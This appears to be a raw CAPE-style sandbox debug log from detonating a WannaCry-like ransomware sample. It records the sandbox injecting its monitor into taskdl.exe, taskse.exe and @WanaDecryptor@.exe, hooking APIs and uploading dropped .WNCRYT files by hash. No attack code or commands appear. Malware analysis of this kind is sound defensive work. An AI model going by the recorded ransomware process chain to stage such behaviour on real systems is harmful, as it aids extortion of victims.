2025-12-08 09:10:11,734 [root] DEBUG: 2020: DLL loaded at 0x000007FEFB4D0000: C:\Windows\system32\dwmapi (0x18000 bytes).
2025-12-08 09:10:11,734 [root] DEBUG: 2020: DLL loaded at 0x000007FEFCA50000: C:\Windows\system32\cryptsp (0x18000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2020, handle 0x618: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x0000000077900000: C:\Windows\system32\Normaliz (0x3000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFE660000: C:\Windows\system32\urlmon (0x18a000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD330000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD2E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD360000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD650000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:11,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD2D0000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 09:10:11,765 [root] DEBUG: 2020: DLL loaded at 0x000007FEFE190000: C:\Windows\system32\iertutil (0x2cc000 bytes).
2025-12-08 09:10:11,765 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2728: C:\Users\user\AppData\Local\Temp\taskdl.exe, ImageBase: 0x00400000
2025-12-08 09:10:11,765 [root] DEBUG: 2020: DLL loaded at 0x000007FEFDC70000: C:\Windows\system32\WININET (0x4ac000 bytes).
2025-12-08 09:10:11,765 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2728
2025-12-08 09:10:11,765 [lib.api.process] INFO: Monitor config for <Process 2728 taskdl.exe>: C:\tmp2azv04x4\dll\2728.ini
2025-12-08 09:10:11,765 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\USERENV (0x1f000 bytes).
2025-12-08 09:10:11,765 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:11,765 [root] DEBUG: 2020: DLL loaded at 0x000007FEFC670000: C:\Windows\system32\credssp (0xa000 bytes).
2025-12-08 09:10:11,796 [root] DEBUG: Loader: Injecting process 2728 (thread 1612) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:11,796 [root] DEBUG: 2020: DLL loaded at 0x000007FEF7DC0000: C:\Windows\System32\msxml6 (0x1f3000 bytes).
2025-12-08 09:10:11,828 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:11,843 [root] DEBUG: 2020: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:10:11,843 [root] DEBUG: 2020: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 09:10:11,843 [root] DEBUG: 2020: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 09:10:11,859 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:11,859 [lib.api.process] INFO: Injected into 32-bit <Process 2728 taskdl.exe>
2025-12-08 09:10:11,859 [root] DEBUG: 2020: DLL loaded at 0x000007FEFCA50000: C:\Windows\system32\CRYPTSP (0x18000 bytes).
2025-12-08 09:10:11,875 [root] DEBUG: 2020: DLL loaded at 0x000007FEFC750000: C:\Windows\system32\rsaenh (0x47000 bytes).
2025-12-08 09:10:11,875 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2728
2025-12-08 09:10:11,890 [lib.api.process] INFO: Monitor config for <Process 2728 taskdl.exe>: C:\tmp2azv04x4\dll\2728.ini
2025-12-08 09:10:11,890 [root] DEBUG: 2020: DLL loaded at 0x000007FEF85C0000: C:\Windows\system32\winhttp (0x71000 bytes).
2025-12-08 09:10:11,890 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:11,890 [root] DEBUG: 2020: DLL loaded at 0x000007FEF8550000: C:\Windows\system32\webio (0x65000 bytes).
2025-12-08 09:10:11,906 [root] DEBUG: 2020: api-rate-cap: GetSystemTimeAsFileTime hook disabled due to rate
2025-12-08 09:10:11,906 [root] DEBUG: 2020: api-rate-cap: GetSystemTimeAsFileTime hook disabled due to rate
2025-12-08 09:10:11,906 [root] DEBUG: Loader: Injecting process 2728 (thread 1612) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:11,906 [root] DEBUG: 2020: DLL loaded at 0x000007FEF3460000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2025-12-08 09:10:11,921 [root] DEBUG: 2020: api-rate-cap: NtDelayExecution hook disabled due to rate
2025-12-08 09:10:11,921 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:11,921 [root] DEBUG: 2020: DLL loaded at 0x000007FEFC870000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2025-12-08 09:10:11,921 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:11,968 [root] DEBUG: 2020: DLL loaded at 0x000007FEFC9F0000: C:\Windows\system32\mswsock (0x55000 bytes).
2025-12-08 09:10:11,968 [lib.api.process] INFO: Injected into 32-bit <Process 2728 taskdl.exe>
2025-12-08 09:10:12,062 [root] DEBUG: 2728: Python path set to 'C:\Python38'.
2025-12-08 09:10:12,062 [root] DEBUG: 2728: Dropped file limit defaulting to 100.
2025-12-08 09:10:12,218 [root] DEBUG: 2020: DLL loaded at 0x000007FEFC9E0000: C:\Windows\System32\wship6 (0x7000 bytes).
2025-12-08 09:10:12,218 [root] DEBUG: 2020: DLL loaded at 0x000007FEF85C0000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2025-12-08 09:10:12,234 [root] DEBUG: 2020: DLL loaded at 0x000007FEF8550000: C:\Windows\system32\webio (0x65000 bytes).
2025-12-08 09:10:12,234 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:12,234 [root] DEBUG: 2020: DLL loaded at 0x000007FEFAA50000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2025-12-08 09:10:12,249 [root] DEBUG: 2728: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:12,249 [root] DEBUG: 2020: DLL loaded at 0x000007FEFAA30000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2025-12-08 09:10:12,249 [root] DEBUG: 2728: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:12,265 [root] DEBUG: 2020: DLL loaded at 0x000007FEFC460000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2025-12-08 09:10:12,265 [root] DEBUG: 2020: DLL loaded at 0x000007FEF8180000: C:\Windows\System32\npmproxy (0xc000 bytes).
2025-12-08 09:10:12,265 [root] DEBUG: 2728: Monitor initialised: 32-bit capemon loaded in process 2728 at 0x74260000, thread 1612, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:10:12,265 [root] DEBUG: 2020: DLL loaded at 0x000007FEF7FC0000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2025-12-08 09:10:12,265 [root] DEBUG: 2728: Commandline: taskdl.exe
2025-12-08 09:10:12,281 [root] DEBUG: 2728: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:12,281 [root] DEBUG: 2728: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:10:12,281 [root] DEBUG: 2728: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:10:12,281 [root] DEBUG: 2020: DLL loaded at 0x000007FEFB1E0000: C:\Windows\system32\napinsp (0x15000 bytes).
2025-12-08 09:10:12,281 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:10:12,296 [root] DEBUG: 2728: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:10:12,296 [root] DEBUG: 2020: DLL loaded at 0x000007FEFB1C0000: C:\Windows\system32\pnrpnsp (0x19000 bytes).
2025-12-08 09:10:12,296 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:10:12,296 [root] DEBUG: 2020: DLL loaded at 0x000007FEFB2F0000: C:\Windows\System32\winrnr (0xb000 bytes).
2025-12-08 09:10:12,296 [root] DEBUG: 2020: DLL loaded at 0x000007FEFAAE0000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2025-12-08 09:10:12,296 [root] DEBUG: 2728: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:10:12,312 [root] DEBUG: 2728: Hooked 611 out of 613 functions
2025-12-08 09:10:12,312 [root] DEBUG: 2728: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:10:12,312 [root] DEBUG: 2728: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2f0000
2025-12-08 09:10:12,312 [root] INFO: Loaded monitor into process with pid 2728
2025-12-08 09:10:12,328 [root] DEBUG: 2728: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004019B1, thread 1612).
2025-12-08 09:10:12,328 [root] DEBUG: 2728: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:10:12,328 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 528: C:\Windows\system32\DllHost.exe, ImageBase: 0x00000000FFC70000
2025-12-08 09:10:12,328 [root] DEBUG: 2728: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:12,328 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 528
2025-12-08 09:10:12,343 [lib.api.process] INFO: Monitor config for <Process 528 dllhost.exe>: C:\tmp2azv04x4\dll\528.ini
2025-12-08 09:10:12,343 [root] DEBUG: 2728: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:12,343 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:10:12,343 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\397.WNCRYT to files\2e466986fedf0a58843a0bdfc56a66a013b5ba99790e9bb090bc29267b0723cd; Size is 16384; Max size: 100000000
2025-12-08 09:10:12,359 [root] DEBUG: Loader: Injecting process 528 (thread 2464) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:12,359 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:12,359 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:12,359 [lib.api.process] INFO: Injected into 64-bit <Process 528 dllhost.exe>
2025-12-08 09:10:12,359 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 528
2025-12-08 09:10:12,359 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\398.WNCRYT to files\ae49e7b1b33cd6745aeaef65e573334e2ff62bebf92156cc4fb1f897b784c87d; Size is 1216; Max size: 100000000
2025-12-08 09:10:12,359 [lib.api.process] INFO: Monitor config for <Process 528 dllhost.exe>: C:\tmp2azv04x4\dll\528.ini
2025-12-08 09:10:12,359 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:10:12,375 [root] DEBUG: Loader: Injecting process 528 (thread 2464) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:12,375 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\402.WNCRYT to files\2a56432f97d9d2da6458ff9007c160a5f6290b440cb103147e85dbcc556b850a; Size is 194520; Max size: 100000000
2025-12-08 09:10:12,375 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:12,375 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:12,375 [lib.api.process] INFO: Injected into 64-bit <Process 528 dllhost.exe>
2025-12-08 09:10:12,390 [root] DEBUG: 528: Python path set to 'C:\Python38'.
2025-12-08 09:10:12,390 [root] DEBUG: 528: Dropped file limit defaulting to 100.
2025-12-08 09:10:12,390 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:12,390 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\403.WNCRYT to files\ea5bb9cfce65caa7b056caa51a4ca412fa91212926a155d0be8ebb380ccbbd81; Size is 1048; Max size: 100000000
2025-12-08 09:10:12,390 [root] DEBUG: 528: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:12,390 [root] DEBUG: 528: YaraScan: Scanning 0x00000000FFC70000, size 0x6012
2025-12-08 09:10:12,390 [root] DEBUG: 528: Monitor initialised: 64-bit capemon loaded in process 528 at 0x000007FEF30B0000, thread 2464, image base 0x00000000FFC70000, stack from 0x0000000000185000-0x0000000000190000
2025-12-08 09:10:12,390 [root] DEBUG: 528: Commandline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
2025-12-08 09:10:12,390 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\405.WNCRYT to files\04de69a4c406df958f1bc6c00ba29c059c80e0d288cd44344271c9f3b2383d46; Size is 2328; Max size: 100000000
2025-12-08 09:10:12,406 [root] DEBUG: 528: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:12,421 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:10:12,421 [root] DEBUG: 528: set_hooks: Unable to hook LockResource
2025-12-08 09:10:12,421 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\407.WNCRYT to files\e65bdf9784b740cd90f964cfbd4d7fbe46cab5ee81fb8c240b085e52e9bc7d99; Size is 1048; Max size: 100000000
2025-12-08 09:10:12,421 [root] DEBUG: 528: Hooked 605 out of 606 functions
2025-12-08 09:10:12,421 [root] INFO: Loaded monitor into process with pid 528
2025-12-08 09:10:12,421 [root] DEBUG: 528: caller_dispatch: Added region at 0x00000000FFC70000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00000000FFC711B5, thread 2464).
2025-12-08 09:10:12,421 [root] DEBUG: 528: YaraScan: Scanning 0x00000000FFC70000, size 0x6012
2025-12-08 09:10:12,421 [root] DEBUG: 528: ProcessImageBase: Main module image at 0x00000000FFC70000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:12,421 [root] DEBUG: 528: DLL loaded at 0x000007FEFD110000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2025-12-08 09:10:12,437 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\408.WNCRYT to files\b25f2c0f229346e58576a66a0707402d03be1abecb04c2741d577d80e86c0ad7; Size is 415096; Max size: 100000000
2025-12-08 09:10:12,437 [root] DEBUG: 528: DLL loaded at 0x000007FEFE7F0000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2025-12-08 09:10:12,437 [root] DEBUG: 528: DLL loaded at 0x000007FEFEB70000: C:\Windows\system32\OLEAUT32 (0xdb000 bytes).
2025-12-08 09:10:12,437 [root] DEBUG: 528: DLL loaded at 0x000007FEFCA50000: C:\Windows\system32\CRYPTSP (0x18000 bytes).
2025-12-08 09:10:12,437 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\409.WNCRYT to files\11169d1e56565e93b09d1c6bbbb0d677c69991106619938dea14584150296136; Size is 1216; Max size: 100000000
2025-12-08 09:10:12,437 [root] DEBUG: 528: DLL loaded at 0x000007FEFC750000: C:\Windows\system32\rsaenh (0x47000 bytes).
2025-12-08 09:10:12,437 [root] DEBUG: 528: DLL loaded at 0x000007FEFD200000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2025-12-08 09:10:12,453 [root] DEBUG: 528: DLL loaded at 0x000007FEFB9F0000: C:\Windows\system32\uxtheme (0x56000 bytes).
2025-12-08 09:10:12,453 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\454.WNCRYT to files\e58a3a6f3cdd379c9e867f3c75a333175f51576e67a9df46975d86c660a0187f; Size is 125712; Max size: 100000000
2025-12-08 09:10:12,453 [root] DEBUG: 528: DLL loaded at 0x000007FEFDC70000: C:\Windows\System32\wininet (0x4ac000 bytes).
2025-12-08 09:10:12,468 [root] DEBUG: 528: DLL loaded at 0x000007FEFD650000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:12,468 [root] DEBUG: 528: DLL loaded at 0x000007FEFD2E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:12,468 [root] DEBUG: 528: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:12,468 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\455.WNCRYT to files\cdb0566e58cec8b9cd768a2d6d9eb3d5c705b4764d45abcc0daafe5bdb483705; Size is 1048576; Max size: 100000000
2025-12-08 09:10:12,468 [root] DEBUG: 528: DLL loaded at 0x000007FEFC390000: C:\Windows\system32\version (0xc000 bytes).
2025-12-08 09:10:12,468 [root] DEBUG: 528: DLL loaded at 0x000007FEFD2D0000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 09:10:12,468 [root] DEBUG: 528: DLL loaded at 0x0000000077900000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-08 09:10:12,484 [root] DEBUG: 528: DLL loaded at 0x000007FEFE190000: C:\Windows\system32\iertutil (0x2cc000 bytes).
2025-12-08 09:10:12,484 [root] DEBUG: 528: DLL loaded at 0x000007FEFD360000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 09:10:12,484 [root] DEBUG: 528: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\USERENV (0x1f000 bytes).
2025-12-08 09:10:12,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\456.WNCRYT to files\4289aef4eebf7ecc6bea4bb9dc0c98e4d7757522c52cc994928ad10c0122e512; Size is 3256; Max size: 100000000
2025-12-08 09:10:12,484 [root] DEBUG: 528: DLL loaded at 0x000007FEFD2B0000: C:\Windows\system32\profapi (0xf000 bytes).
2025-12-08 09:10:12,484 [root] DEBUG: 528: DLL loaded at 0x000007FEFD330000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 09:10:12,500 [root] DEBUG: 528: DLL loaded at 0x000007FEFCEC0000: C:\Windows\system32\Secur32 (0xb000 bytes).
2025-12-08 09:10:12,500 [root] DEBUG: 528: DLL loaded at 0x000007FEFECB0000: C:\Windows\system32\SHELL32 (0xd8b000 bytes).
2025-12-08 09:10:12,500 [root] DEBUG: 528: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 09:10:12,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\518.WNCRYT to files\ee3e1212dbd47e058e30b119a92f853d3962558065fa3065ad5c1d47654c4140; Size is 24; Max size: 100000000
2025-12-08 09:10:12,515 [root] DEBUG: 528: DLL loaded at 0x000007FEF85C0000: C:\Windows\system32\winhttp (0x71000 bytes).
2025-12-08 09:10:12,515 [root] DEBUG: 528: DLL loaded at 0x000007FEF8550000: C:\Windows\system32\webio (0x65000 bytes).
2025-12-08 09:10:12,531 [root] DEBUG: 528: DLL loaded at 0x000007FEFC9F0000: C:\Windows\system32\mswsock (0x55000 bytes).
2025-12-08 09:10:12,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\519.WNCRYT to files\8429d5c6eb134eb64d8b0f3ecce83ab4d4d16e73c2d76993163372692b65ea8f; Size is 24; Max size: 100000000
2025-12-08 09:10:12,531 [root] DEBUG: 528: DLL loaded at 0x000007FEFC9E0000: C:\Windows\System32\wship6 (0x7000 bytes).
2025-12-08 09:10:12,531 [root] DEBUG: 528: DLL loaded at 0x000007FEFAB40000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2025-12-08 09:10:12,546 [root] DEBUG: 528: DLL loaded at 0x000007FEFABE0000: C:\Windows\system32\WINNSI (0xb000 bytes).
2025-12-08 09:10:12,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\520.WNCRYT to files\05da3daa836dc6ed72144dff35f8d90396b4d524dc35ef8d8cd01d86855be858; Size is 24; Max size: 100000000
2025-12-08 09:10:12,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\521.WNCRYT to files\62ce260f5e10fc17bf63faafa39912febf61d20fad51cc11606a295801743799; Size is 24; Max size: 100000000
2025-12-08 09:10:12,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\78.WNCRYT to files\247b1c7140f629ddee255d7eb0704635edb22169f52745f20b442dc4a4f4bf42; Size is 8192; Max size: 100000000
2025-12-08 09:10:14,640 [lib.common.results] WARNING: File C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT size is too big: 838860800, ignoring
2025-12-08 09:10:14,656 [root] DEBUG: 2728: NtTerminateProcess hook: Attempting to dump process 2728
2025-12-08 09:10:14,656 [root] DEBUG: 2728: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:14,656 [root] INFO: Process with pid 2728 has terminated
2025-12-08 09:10:16,750 [root] DEBUG: 2020: DLL loaded at 0x000007FEFBFE0000: C:\Windows\system32\POWRPROF (0x2c000 bytes).
2025-12-08 09:10:17,531 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
2025-12-08 09:10:17,531 [root] INFO: Process with pid 528 has terminated
2025-12-08 09:10:17,531 [root] DEBUG: 528: NtTerminateProcess hook: Attempting to dump process 528
2025-12-08 09:10:17,531 [root] DEBUG: 528: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:22,328 [root] DEBUG: 900: caller_dispatch: Added region at 0x00000000FF1E0000 to tracked regions list (advapi32::RegOpenKeyExW returns to 0x00000000FF1E1318, thread 944).
2025-12-08 09:10:22,328 [root] DEBUG: 900: YaraScan: Scanning 0x00000000FF1E0000, size 0xa052
2025-12-08 09:10:22,328 [root] DEBUG: 900: ProcessImageBase: Main module image at 0x00000000FF1E0000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:40,296 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 1044: C:\Users\user\AppData\Local\Temp\taskse.exe, ImageBase: 0x00400000
2025-12-08 09:10:40,296 [root] INFO: Announced 32-bit process name: taskse.exe pid: 1044
2025-12-08 09:10:40,296 [lib.api.process] INFO: Monitor config for <Process 1044 taskse.exe>: C:\tmp2azv04x4\dll\1044.ini
2025-12-08 09:10:40,296 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:40,312 [root] DEBUG: Loader: Injecting process 1044 (thread 2168) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,312 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:40,312 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,312 [lib.api.process] INFO: Injected into 32-bit <Process 1044 taskse.exe>
2025-12-08 09:10:40,312 [root] INFO: Announced 32-bit process name: taskse.exe pid: 1044
2025-12-08 09:10:40,312 [lib.api.process] INFO: Monitor config for <Process 1044 taskse.exe>: C:\tmp2azv04x4\dll\1044.ini
2025-12-08 09:10:40,312 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:40,328 [root] DEBUG: Loader: Injecting process 1044 (thread 2168) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,328 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:40,328 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,328 [lib.api.process] INFO: Injected into 32-bit <Process 1044 taskse.exe>
2025-12-08 09:10:40,343 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 300: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe, ImageBase: 0x00400000
2025-12-08 09:10:40,343 [root] DEBUG: 1044: Python path set to 'C:\Python38'.
2025-12-08 09:10:40,343 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 300
2025-12-08 09:10:40,343 [root] DEBUG: 1044: Dropped file limit defaulting to 100.
2025-12-08 09:10:40,343 [lib.api.process] INFO: Monitor config for <Process 300 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\300.ini
2025-12-08 09:10:40,343 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:40,343 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:40,343 [root] DEBUG: 1044: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:40,343 [root] DEBUG: Loader: Injecting process 300 (thread 1868) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,359 [root] DEBUG: 1044: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:40,359 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:40,359 [root] DEBUG: 1044: Monitor initialised: 32-bit capemon loaded in process 1044 at 0x74260000, thread 2168, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:10:40,359 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,359 [root] DEBUG: 1044: Commandline: taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
2025-12-08 09:10:40,359 [lib.api.process] INFO: Injected into 32-bit <Process 300 @WanaDecryptor@.exe>
2025-12-08 09:10:40,359 [root] DEBUG: 1044: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:40,375 [root] DEBUG: 1044: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:10:40,375 [root] DEBUG: 1044: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:10:40,375 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 300
2025-12-08 09:10:40,375 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:10:40,375 [root] DEBUG: 1044: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:10:40,375 [lib.api.process] INFO: Monitor config for <Process 300 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\300.ini
2025-12-08 09:10:40,375 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:10:40,375 [root] DEBUG: 1044: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:10:40,375 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:40,375 [root] DEBUG: 1044: Hooked 611 out of 613 functions
2025-12-08 09:10:40,375 [root] DEBUG: 1044: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:10:40,375 [root] DEBUG: 1044: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x410000
